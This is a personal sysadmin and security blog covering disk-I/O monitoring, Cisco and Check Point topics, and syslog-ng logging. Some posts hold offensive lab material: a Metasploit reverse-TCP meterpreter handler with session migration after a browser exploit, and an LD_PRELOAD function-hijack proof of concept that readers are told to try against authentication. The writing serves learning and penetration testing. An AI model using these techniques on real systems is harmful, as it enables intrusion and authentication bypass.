Latest Entries »

How to know which process is eating your hard disk

Filed Under: Allgemeines by carlos — Hinterlasse einen Kommentar
19. Februar 2010

OK, I must admit it. I love to pipe commands, I always thought is one of the most powerful features of the linux command line.

The following case is an excellent example.

Now and then I’ve been experiencing random increments in my hard disk usage. And with increments I mean the whole processor was busy with I/O operations. I asked some colleagues, experienced Linux administrators if there were a tool like top, with which I would be able to find out which process is accessing the disk at most. No one came with an answer.

After some research I found a quite satisfactory solution using a bit of bash.


root@dell:~# pidstat -d | sort -nr -k 4 | head -10

[...]
16:18:50          898      0,00    236,30 0,00  kjournald2
16:18:50            1     28,97     44,90      1,17  init
16:18:50          416      0,00      6,07      0,00  kjournald2
16:18:50         1915      2,05      1,94      0,05  compiz.real
16:18:50         1204      0,90      0,40      0,01  cron
16:18:50        11618      0,00      0,31      0,07  bash
16:18:50         1125      1,54      0,16      0,00  mount.ntfs
16:18:50         8232      0,08      0,15      0,00  liferea
16:18:50         1344      0,09      0,13      0,00  devkit-power-da

This runs the command pidstat -d, which gives info about disk usage per pid. Then uses the fourth column as index to order numerically the ouput. Note the use of the -r modifier, this is because the normal operation of sort is to show the lower values first and we need the opposite in this case. Finally, the head command just show us the first 10 lines, this is more than necessary.

The fourth column of pidstat’s output is the number of kB (read) pro second. In case you cannot find any value really out of bounds, you can give it a try with “sort -nr -k 3″ which would give us the processes that went amok on reading.

As a further investigation you can use the PID of the process (second column) with lsof to find out which files are being accessed by the crazy proc and try to figure out the exact cause of the problem.

What you do now with this info is up to you :)

UPDATE: it looks like this is not the best method and there is already a “top-like” monitor for disk activity, called iotop.

root@dell:~# apt-get install iotop

Tags: , , , , , ,
Kommentar

Deceive, exploit, migrate and kill.

Filed Under: Allgemeines by carlos — Hinterlasse einen Kommentar
2. Februar 2010

I’ve been playing with the Metasploit framework and the *evil* meterpreter payload today (I would tell you why but I’m sure it would break a non-disclosure agreement or something :) )

In particular I was studying client-side attacks and recreating the infamous MS07-17 (a classic!). While I was enjoying myself among hex code and debuggers, the way nerds do, I realized that the browser always hanged, thus forcing the user to kill the process and cutting down our meterpreter session. Not good. “Got root?” yes, but just for twenty seconds.

Looking for ways to improve the stability of the exploit, a colleague proposed a workaround, migrate the [meterpreter] server to another process. I totally forgot about the migrate command. This is how it can be done and the issues left unsolved.

I have just implemented the MS07-17 ANI vulnerability with the meterpreter reverse tcp payload, like this

I have “tricked” the user to visit my website and he inadvertently downloaded the evil cursor code that exploits the vuln in the GDI code. Oopppss! As a result, he has connected back to the machine, received the dll (it’s a staged payload) and  injected it into the running process, iexplore.exe in this case.

We can indeed confirm that looking at the dll’s with Process Explorer, as in the follow capture:

After the migration of the meterpreter server to another process, less likely to be killed (for example explorer.exe), IE will crash but the process won’t die completely. Trying to attach a debugger to it will show us that the process window name is “MCI command handling window”. Although Process Explorer still shows the evil dll located at some point in the memory of this process, this address is not reachable using the debugger.

However, just to do things well it would be a good idea to kill the process (or what remains of it).

The whole process would be something like the following paste:

root@bt:/pentest/exploits/framework3# ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.8.31 EXITFUNC=seh E
[*] Please wait while we load the module tree...
[*] Started reverse handler on port 4444
[*] Starting the payload handler...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.8.31:4444 -> 192.168.9.34:1088)

meterpreter > ps

Process list
============

PID   Name                 Arch  User                 Path
---   ----                 ----  ----                 ----
0     [System Process]
4     System               x86
580   smss.exe             x86   NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
652   csrss.exe            x86   NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\csrss.exe
712   winlogon.exe         x86   NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe
756   services.exe         x86   NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe

[...]

1860  ctfmon.exe           x86   CLIENT034\offsec     C:\WINDOWS\system32\ctfmon.exe

 2004  svchost.exe          x86                        C:\WINDOWS\System32\svchost.exe

 1880  explorer.exe         x86   CLIENT034\offsec     C:\WINDOWS\explorer.exe

 1920  iexplore.exe         x86   CLIENT034\offsec     C:\Program Files\Internet Explorer\iexplore.exe

meterpreter > migrate 1880

[*] Migrating to 1880...

[*] Migration completed successfully.

meterpreter > kill 1920

Killing: 1920

meterpreter > getpid

Current pid: 1880

meterpreter >

As easy as “deceive, exploit, migrate and kill” :)

Tags: , ,
Kommentar

Metasploit and the Pcaprub wrapper

Filed Under: Allgemeines by carlos — 1 Kommentar
1. Februar 2010

Metasploit (i love you) is, it goes without saying, the penetration testing framework of choice of a wide spectrum of professionals (and script-kiddies).

One of the reasons is that everything works “out of the box”, kind of a plug and play evil hacker toolbox.

But playing with it in Backtrack I found that some of the dependencies are not installed, in particular the Pcap wrapper.


msf auxiliary(ipidseq) > run

[-] Auxiliary failed: RuntimeError Pcaprub is not available
[-] Call stack:
[-] (eval):65:in `run_host'
[-] /opt/metasploit3/msf3/lib/msf/core/auxiliary/scanner.rb:114:in `join'
[-] /opt/metasploit3/msf3/lib/msf/core/auxiliary/scanner.rb:114:in `run'
[*] Auxiliary module execution completed

This is really an annoyance if you take into account that several auxiliary modules make use of the Pcap library.

Fortunately, get this working is really easy, just locate the external/pcaprub directory under the framework root dir and compile/install this ruby module.


root@bt:/pentest/exploits/framework3/external/pcaprub# ls
LICENSE README extconf.rb pcaprub.c test_pcaprub.rb


root@bt:/pentest/exploits/framework3/external/pcaprub# ruby extconf.rb && make
checking for pcap_open_live() in -lpcap... yes
checking for pcap_setnonblock() in -lpcap... yes
creating Makefile
cc -I. -I. -I/usr/lib/ruby/1.8/i486-linux -I. -D_FILE_OFFSET_BITS=64 -fPIC -fno-strict-aliasing -g -g -O2 -fPIC -c pcaprub.c
cc -shared -o pcaprub.so pcaprub.o -L. -L/usr/lib -L. -Wl,-Bsymbolic-functions -rdynamic -Wl,-export-dynamic -lruby1.8 -lpcap -lpcap -lpthread -ldl -lcrypt -lm -lc

root@bt:/pentest/exploits/framework3/external/pcaprub# make install
/usr/bin/install -c -m 0755 pcaprub.so /usr/local/lib/site_ruby/1.8/i486-linux

And there you go! Keep exploiting! :)

Tags: , , , ,
Kommentar

SLCM: Some Linux CLI Magic

Filed Under: Allgemeines by carlos — Hinterlasse einen Kommentar
20. Januar 2010

I’m right now taking the PWB course (yes, from the creators of Backtrack!) and I must say it is really well structured. Even at the beginning, where very basic concepts/techniques are introduced, it forces you to review interesting stuff. And this is one of the strong points of the course: it’s mostly practical.

While in the process of enumerating usernames from an insecure mail server I had to write a short Python script and feed it with a wordlist of common usernames. The list I had was written in uppercase but what I wanted was lowercase. After some research about the sed command I found a neat way to do this using the command line:

carlos@dell:~$ sed -i ‘y/’ABCDEFGHIJKLMNOPQRSTUVWXYZ’/'abcdefghijklmnopqrstuvwxyz’/’ 200_usernames.txt

where -i means “in place”, that is, search for the pattern, perform the substitution and write on the same file (use with caution!). If you want to test before destroying the original file, -e can be used instead, which writes to the standard output.

This way, besides the pure offensive security stuff you learn, one is forced to research and learn some basic programming and command line tricks as well. Bonus! ;)

Tags: , , , ,
Kommentar

Option 81 (sounds like Area 51)

Filed Under: Allgemeines by carlos — 1 Kommentar
16. Dezember 2009

Trying to diagnose why a process in one of our routers went amok (!) I ran into a document that explains the DHCP/DNS Update mechanism in Windows clients. This topic has always been a bit obscure, so I decided to write a note here for the record.

Option 81 (a.ka. FQDN option) is one of the many DHCP option fields. This one in particular is used by the clients at DHCPREQUEST time to tell the DHCP server how it should behave concerning DNS updates.

For clients running Windows 2000, Windows XP or Windows Server 2003, the process goes like this:

1. The client sends a DHCPREQUEST and include the option 81. By default it requests that the server updates (sends to the DNS server) only the PTR record, while the client is in charge of updating his own A record.

2. If the server is configured with the default settings (update DNS entries only if clients ask for it) answers with a DHCPACK which contains the option 81 which says that it will only update the PTR record, as requested.

3. The only thing left after the agreement is to do it! The client sends a dynamic DNS update to the DNS server and the DHCP server updates the PTR on behalf of the client.

I got this info at the Microsoft Technet site but how does this work when the DHCP server is a Cisco router, instead of a MS server?

Inside the ip dhcp pool section there’s an option to specify how should this server manage the DNS updates. The syntaxis is as follows:

update dns [both | never] [override] [before]

The default option, that is, the behaviour when this option is not explicitly configured is to don’t perform any update. This is similar to using the option never, I guess.

The interesting options here are both and override, which have opposite effects.

Both will make the Cisco router to update both entries (A and PTR) on behalf of the client. This could be useful if the client lacks this capability, for example a very old Windows client.

Override, on the other side, will instruct the router to perform DDNS updates for PTR records even if the client has specified that the server should not send updates.

Long story short, in a regular network configuration with MS Windows clients, the Cisco router should be configured with the (sub)command “update dns” to let the client update its own A record, while the router takes care of the PTR RR.

Tags: , , , ,
Kommentar

Juniper impressions

Filed Under: Allgemeines by carlos — Hinterlasse einen Kommentar
27. November 2009

I thought it would be interesting to record my opinion (or should I say prejudices) about Juniper right before starting with the certifications.

Juniper hardware is a server architecture, with Intel processors. For that reason they cannot deliver near the performance of a Cisco device, which has dedicated hardware.
On the other hand, being based on FreeBSD with routing/firewalling daemons makes possible to use the full power of a Unix shell within the OS.

Let’s see if after the JNCIS-SEC certification they end up convincing me :)

Update: it looks like they have some ASIC integrated for R/S functions. I don’t recall seeing that…

Tags: ,
Kommentar

Trace your way through the ASA

Filed Under: Allgemeines by carlos — Hinterlasse einen Kommentar
24. November 2009

There are few things more difficult than debugging a complex problem in a firewall. Everybody that had to do it even just once would have, for sure, nice memories about it.

But as almost everything, it just a matter of having the right tool. In the case of a Cisco ASA is all about the Packet Tracer.

The syntax is as follows:

packet-tracer input inside tcp 172.27.2.70 1025 172.29.4.18 3389 detailed

where the numbers are the IP:port source and destination and inside is the name of the interface where the packet “originates”.

This injects a virtual packet into the firewall engine and trace every step through it. As an example, some of the info we get looks like this:

Phase: 3
Type: ROUTE-LOOKUP
Subtype: input
Result: ALLOW
Config:
Additional Information:
in   172.29.4.16     255.255.255.240 outside

[...]

 Phase: 6
Type: NAT
Subtype: host-limits
Result: ALLOW
Config:
nat (inside) 2 access-list ********
  match ip inside ***** 255.255.0.0 inside ****** 255.255.255.192
    dynamic translation to pool 2 (No matching global)
    translate_hits = 0, untranslate_hits = 0
Additional Information:
 Forward Flow based lookup yields rule:
 in  id=0xcc8940e8, priority=2, domain=host, deny=false
        hits=23838, user_data=0xcc893cd0, cs_id=0x0, reverse, flags=0x0, protocol=0
        src ip=172.27.0.0, mask=255.255.0.0, port=0
        dst ip=0.0.0.0, mask=0.0.0.0, port=0, dscp=0x0

[...]

Phase: 7
Type: VPN
Subtype: encrypt
Result: ALLOW
Config:
Additional Information:
 Forward Flow based lookup yields rule:
 out id=0xcd9715d8, priority=70, domain=encrypt, deny=false
        hits=79, user_data=0x9730c, cs_id=0xcd790d80, reverse, flags=0x0, protocol=0
        src ip=172.27.0.0, mask=255.255.0.0, port=0
        dst ip=172.29.4.16, mask=255.255.255.240, port=0, dscp=0x0

[...]

And the most important, the final result (end to end)

Result:
input-interface: inside
input-status: up
input-line-status: up
output-interface: outside
output-status: up
output-line-status: up
Action: allow


This way is “easy” to determine where the packet got dropped. For the GUI maniacs there is the graphical version as a tool in Cisco ASDM. Here a screenshot.

ASDM

Kommentar

CCSA Exam

Filed Under: Allgemeines by carlos — Hinterlasse einen Kommentar
24. November 2009

Without violation the NDA :) this is my short review of the exam:

It consists of 70 questions and you need to get 70% of them right (quite easy)

It’s possible to go back and mark for review! Incredible if you are used to Cisco Exams…

The usual questions are asked regarding the basic topics: rule creation and modification, NAT, CLI management and maintaining a Check Point solution (backup, monitoring, etc.)

For me, the boomer was more QoS questions than expected, specially critical if you used the “NGX R65 Security Administration” book to prepare the exam (which doesn’t contain a word about QoS :-/)

Anyway, this is an easy one if you have some experience (from 0 to 6 months) with the NGX R65, a VMWare image to play with and a good book. If you have any doubt… don’t. Go for it :)

Tags: , ,
Kommentar

DLL injection, baby

Filed Under: Allgemeines by carlos — Hinterlasse einen Kommentar
25. September 2009

There are a lot of concepts (specially in the world of computer security) which look very mystic and dll injection is, without any doubt, one of those. I’ll just post here a proof of concept because… well, because I think it’s interesting shit! :)

I’ll do it on Linux because I feel more comfortable in this OS but the concept is similar in MS Windows. First of all, an excerpt from an online program library howto:

Shared libraries are libraries that are loaded by programs when they start. When a shared library is installed properly, all programs that start afterwards automatically use the new shared library. It’s actually much more flexible and sophisticated than this, because the approach used by Linux permits you to:

  • update libraries and still support programs that want to use older, non-backward-compatible versions of those libraries;
  • override specific libraries or even specific functions in a library when executing a particular program.
  • do all this while programs are running using existing libraries.

The second point is the interesting one for us, since it will allow us to “impersonate” some of the functions the program calls that are situated inside dynamic link libraries. Several examples crossed my mind right now, all of them containing functions with names like checkPassword() or something similar :)

Instead of giving a boring lecture I’ll try to explain every point on the way. Let’s say our target program is this one (core.c):

#include <stdio.h>
#include <stdint.h>
#include <time.h>

int
main(int argc, char **argv)
{
time_t result;

printf(“I’m about to call time() in time.h\n”);
result = time(NULL);
printf(“The time is %ju secs\n”, (uintmax_t)result);

return(0);
}

It just get the system time using the time() function in glibc 2.0 and prints it to the console.

carlos@pattern:~/Projects/dll_injection$ ./core
I’m about to call time() in time.h
The time is 1253876880 secs
carlos@pattern:~/Projects/dll_injection$ ./core
I’m about to call time() in time.h
The time is 1253876888 secs

Until here, nothing really interesting so let’s get a bit more deep. In order to get the system time, core.c uses a function which code is not in my program but inside a shared library. Our core.c program publishes, after compiling, a series of symbols, that is, information about where should these functions code be inserted. This can be inspected with nm:

carlos@pattern:~/Projects/dll_injection$ nm core
08049f20 d _DYNAMIC
08049ff4 d _GLOBAL_OFFSET_TABLE_
0804853c R _IO_stdin_used
[...]
0804a014 W data_start
0804a020 b dtor_idx.6637
08048400 t frame_dummy
08048424 T main
U printf@@GLIBC_2.0
U puts@@GLIBC_2.0
U time@@GLIBC_2.0

Notice how time and printf are listed here. We can see as well what libraries are linked at runtime with ldd:

carlos@pattern:~/Projects/dll_injection$ ldd core
linux-gate.so.1 =>  (0xb8058000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7eda000)
/lib/ld-linux.so.2 (0xb8059000)

As expected, the libc is listed here, along with a very special one ld-linux.so.2, the dynamic linker/loader.

From the man page:

ld.so loads the shared libraries needed by a program, prepares the program to run, and then runs it.  Unless  explicitly  specified  via  the -static  option to ld during compilation, all Linux programs are incomplete and require further linking at run time.

[SuperNerd parenthesis]

GCC inserts at compile time an ELF header specifying which dynamic loader will be used at runtime:

carlos@pattern:~/Projects/dll_injection$ readelf -l core

Elf file type is EXEC (Executable file)
Entry point 0×8048370
There are 8 program headers, starting at offset 52

Program Headers:
Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
PHDR           0×000034 0×08048034 0×08048034 0×00100 0×00100 R E 0×4
INTERP         0×000134 0×08048134 0×08048134 0×00013 0×00013 R   0×1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD           0×000000 0×08048000 0×08048000 0×00580 0×00580 R E 0×1000
LOAD           0x000f0c 0x08049f0c 0x08049f0c 0×00110 0×00118 RW  0×1000
DYNAMIC        0x000f20 0x08049f20 0x08049f20 0x000d0 0x000d0 RW  0×4
NOTE           0×000148 0×08048148 0×08048148 0×00020 0×00020 R   0×4

[...]

That instructs the OS to pass the control of the program to ld-linux.so.2 instead of the normal entry point of the application.

[End of SuperNerd parenthesis]

ld-linux.so.2 checks the symbols (the way nm does), searches for the library files and loads the corresponding code into the process memory.

There’s a way, however, of preloading a shared object (or dll) at run time giving it precedence over this process. Here is where the technical info gets obscure but I guess this lib becomes a preferred target for symbol retrieval, so if it contains a symbol with a matching name, its code will be loaded and this dependency marked as satisfied.

That’s all we need to know. Let’s create our shared object then with a function called… yes, time()

carlos@pattern:~/Projects/dll_injection$ cat lib_evil.c

/* The evil library.
It exports the symbol time()
and overrides glibc
*/

#include <stdio.h>

int time()
{
printf(“FAKE TIME FUNCTION says: No you didn’t!\n”);
return(1234);
}

and compile it as shared object:

To create the object file:

$ gcc -c -fPIC -ggdb -Wall -o lib_evil.o lib_evil.c

To create the shared object (library .so):

$ ld -shared lib_evil.o -o lib_evil.so

Finally, let’s try our cool DLL injection, preloading our evil shared object.

Normal operation

carlos@pattern:~/Projects/dll_injection$ ./core
I’m about to call time() in time.h
The time is 1253881612 secs

DLL injection
carlos@pattern:~/Projects/dll_injection$ LD_PRELOAD=”./lib_evil.so” ./core
I’m about to call time() in time.h
FAKE TIME FUNCTION says: No you didn’t!
The time is 1234 secs

Now find your favourite software and try to bypass authentication following this pseudocode:

function checkPassword

return EverythingCool ;)

Tags: , , , ,
Kommentar

syslog-ng is my hero. No, really.

Filed Under: Allgemeines by carlos — Hinterlasse einen Kommentar
13. August 2009

No doubt that syslog-ng is cool when used to concentrate all logs from your IT infrastructure in the same place. But having just a bunch of ASCII files is not the most practical system.

I know what you are thinking right now: “It would be cool to log to a database and have some kind of front end to visualize it”. Yes, it would be… actually it IS.

Just a quick description of how to do it (the details are boring :) )

The trick is to modify the later configuration (check syslog-ng is my hero) and add a new destination clause:

# Destination MySQL

destination d_mysql {
pipe(“/tmp/mysql.syslog-ng.pipe”
template(“INSERT INTO logs
(host, facility, priority, level, tag, datetime, program, msg)
VALUES ( ‘$HOST’, ‘$FACILITY’, ‘$PRIORITY’, ‘$LEVEL’, ‘$TAG’, ‘$YEAR-$MONTH-$DAY $HOUR:$MIN:$SEC’,
‘$PROGRAM’, ‘$MSG’ );\n”) template-escape(yes));
};

This associates a named pipe, in our example located in /tmp/mysql.syslog-ng.pipe but the name and location are not important, to a MySQL statement. This SQL sentence has been crafted in this particular way for reasons that will be apparent later. This new destination must be used for every logging source we want to include in our database, modifying the configuration like this:

log{
source(src);
filter(f_MUNICH);
destination(d_mysql);
};

That says to syslog-ng to redirect the log stream to this pipe which, in turn, will insert the data into this MySQL table using the forementioned INSERT statement. Just a hint about this, we need to create the pipe under Linux with this command:

mkfifo /tmp/mysql.syslog-ng.pipe

and then connect it to the MySQL database as follows:

mysql –user=myuser –password=mypasswordhere logs < /tmp/mysql.syslog-ng.pipe

that is, just a regular flow redirection.
Even better, and recommended is to setup a script to do this everytime you boot your system, something like:

#!/bin/sh
#
# File: syslogng-mysql-pipe.sh
#
# Take input from a FIFO and run execute it as a query for
# a mysql database.
#
# IMPORTANT NOTE: This could potentially be a huge security hole.
# You should change permissions on the FIFO accordingly.
#

if [ -e /tmp/mysql.syslog-ng.pipe ]; then
while [ -e /tmp/mysql.syslog-ng.pipe ]
do
mysql -usyslog –password=mypasswordhere logs < /tmp/mysql.syslog-ng.pipe
done
else
mkfifo /tmp/mysql.syslog-ng.pipe
fi

After having this running we can begin to install the PHP frontend that will read and interpret the records in this database. After all, if plain text files weren’t very practical, a SQL database is even worse!

I won’t talk here about it because there’s an online guide much better than any explanation I could write here.
In case you want to check it out before going into all this process, there’s a live demo here. The user/pass are “demo/demo”.

Happy logging! ;)

Tags: , , ,
Kommentar
Powered by WordPress | Theme: Motion by 85ideas.